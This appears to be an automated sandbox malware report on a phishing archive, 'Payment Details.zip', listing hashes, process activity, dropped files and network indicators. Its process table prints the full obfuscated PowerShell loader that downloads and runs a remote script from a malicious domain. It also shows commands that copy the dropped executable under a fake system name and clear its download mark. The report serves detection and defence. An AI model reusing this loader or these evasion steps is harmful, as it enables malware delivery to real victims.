analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Payment Details.zip

Full analysis: https://app.any.run/tasks/eff5b472-f5a5-4808-8fd7-486b00790f55
Verdict: Malicious activity
Threats:

Trojans are a group of malicious programs distinguished by their ability to masquerade as benign software. Depending on their type, trojans possess a variety of capabilities, ranging from maintaining full remote control over the victim’s machine to stealing data and files, as well as dropping other malware. At the same time, the main functionality of each trojan family can differ significantly depending on its type. The most common trojan infection chain starts with a phishing email.

Analysis date: October 14, 2019, 17:27:09
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
opendir
trojan
Indicators:
MIME: application/zip
File info: Zip archive data, at least v2.0 to extract
MD5:

F48D6A935B04AFC3F822CFC2918019C6

SHA1:

CB251DCB2B9421A51A837A705BB57763DB719F82

SHA256:

A1209DB219D3888560D8787C40C8CB5E4BE74CD15587DAFF5216D0BDD5BF3F01

SSDEEP:

24:9DNaoW/W2Tcl3F/C2niwe3Cet7QL8iuOTZxwsFAMy1+:9DNax/W6cqjH7LOFRAMy1+

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • myzo.exe (PID: 3988)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 2748)
    • Starts CMD.EXE for commands execution

      • myzo.exe (PID: 3988)
    • PowerShell script executed

      • powershell.exe (PID: 2748)
    • Executable content was dropped or overwritten

      • cmd.exe (PID: 332)
      • powershell.exe (PID: 2748)
  • INFO

    • Manual execution by user

      • powershell.exe (PID: 2748)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.zip | ZIP compressed archive (100)

EXIF

ZIP

ZipRequiredVersion: 20
ZipBitFlag: 0x0009
ZipCompression: Deflated
ZipModifyDate: 2019:10:11 16:13:11
ZipCRC: 0x1097456e
ZipCompressedSize: 737
ZipUncompressedSize: 2318
ZipFileName: Payment Details.jpeg.lnk
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
41
Monitored processes
5
Malicious processes
0
Suspicious processes
2

Behavior graph

Click at the process to see the details
start drop and start winrar.exe no specs powershell.exe myzo.exe no specs cmd.exe no specs cmd.exe

Process information

PID
CMD
Path
Indicators
Parent process
2576"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\Payment Details.zip"C:\Program Files\WinRAR\WinRAR.exeexplorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Version:
5.60.0
2748"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Windo 1 $xu=[string][char[]]@(0x49,0x45,0x78) -replace ' ','';sal s $xu;$nfr=((New-Object Net.WebClient)).DownloadString('http://globalpaymentportal.co/eft/remittance.ps1');s $nfrC:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3988"C:\Users\Public\myzo.exe"C:\Users\Public\myzo.exepowershell.exe
User:
admin
Company:
TECH CON INDUSTRY SRL
Integrity Level:
MEDIUM
Description:
Windows Font Cache Service and Integration Platform
Version:
9.13.18.22
1048"C:\Windows\System32\cmd.exe" /C type nul > "C:\Users\Public\myzo.exe:Zone.Identifier"C:\Windows\System32\cmd.exemyzo.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
332"C:\Windows\System32\cmd.exe" /c copy "C:\Users\Public\myzo.exe" "C:\Users\admin\AppData\Local\fontdrvhost.exe"C:\Windows\System32\cmd.exe
myzo.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Total events
690
Read events
610
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
1
Text files
0
Unknown types
1

Dropped files

PID
Process
Filename
Type
2748powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\VGPUHQ3HTY3MKOB1DDI9.temp
MD5:
SHA256:
2748powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\97bf0c7fd1de5655.customDestinations-msbinary
MD5:6F0E8E433BAEA6A56320B0EC13021D4F
SHA256:27BA9EAB3EA8F5104AEC9C4C627143DBB4A7D30AB174E92C953B00B0CF3C8D33
2576WinRAR.exeC:\Users\admin\Desktop\Payment Details.jpeg.lnklnk
MD5:4C1CD48C6F957CB4A3FB958278D55123
SHA256:E17233BD3A579D8DEB53EF1D8FC88938A616FA1EEFB017B7A17A74F33E849F01
2748powershell.exeC:\Users\Public\myzo.exeexecutable
MD5:BBC53D6B5B25157865542305CF32F8F2
SHA256:F83109B70DF1EDE6D10605A635D95385A7D1A659E26A5E5DDE239DEA746BC4E9
332cmd.exeC:\Users\admin\AppData\Local\fontdrvhost.exeexecutable
MD5:BBC53D6B5B25157865542305CF32F8F2
SHA256:F83109B70DF1EDE6D10605A635D95385A7D1A659E26A5E5DDE239DEA746BC4E9
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
1
DNS requests
3
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2748
powershell.exe
GET
200
68.65.123.232:80
http://globalpaymentportal.co/eft/remittance.ps1
US
text
1.04 Mb
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2748
powershell.exe
68.65.123.232:80
globalpaymentportal.co
Namecheap, Inc.
US
malicious

DNS requests

Domain
IP
Reputation
globalpaymentportal.co
  • 68.65.123.232
malicious

Threats

Found threats are available for the paid subscriptions
1 ETPRO signatures available at the full report
No debug info